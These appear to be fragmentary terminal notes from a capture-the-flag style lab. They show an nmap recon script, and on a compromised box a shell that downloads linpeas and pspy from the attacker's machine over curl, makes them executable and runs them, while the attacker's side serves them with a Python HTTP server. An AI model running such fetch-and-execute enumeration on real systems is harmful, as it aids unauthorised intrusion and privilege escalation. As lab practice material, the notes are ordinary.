
created a recon folder

hippoeug@kali:~$ cat hackers
1.2.3.4

hippoeug@kali:~$ ./test.sh

hippoeug@kali:~$ ls recon
1.2.3.4.nmap
hippoeug@kali:~$ cat 1.2.3.4.nmap
cat: 1.2.3.4.nmap: No such file or directory
hippoeug@kali:~$ cd recon
hippoeug@kali:~/recon$ cat 1.2.3.4.nmap
# Nmap 7.91 scan initiated Sun Feb  7 22:25:16 2021 as: nmap --top-ports 10 -oN recon/1.2.3.4.nmap 1.2.3.4
# Nmap done at Sun Feb  7 22:25:19 2021 -- 1 IP address (0 hosts up) scanned in 3.10 seconds
hippoeug@kali:~/recon$ 
















=================



pwd
/home/kid
curl -o linpeas http://10.10.14.12/linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  312k  100  312k    0     0   202k      0  0:00:01  0:00:01 --:--:--  202k
ls
html
linpeas
logs
snap
user.txt

./linpeas
/bin/sh: 70: ./linpeas: Permission denied


chmod +x linpeas
./linpeas








curl -o pspy http://10.10.14.12/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3006k  100 3006k    0     0  1000k      0  0:00:03  0:00:03 --:--:-- 1000k






hippoeug@kali:~/Documents$ sudo python -m SimpleHTTPServer 80



./pspy
sh: 27: ./pspy: Permission denied
chmod +x pspy
./pspy
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855












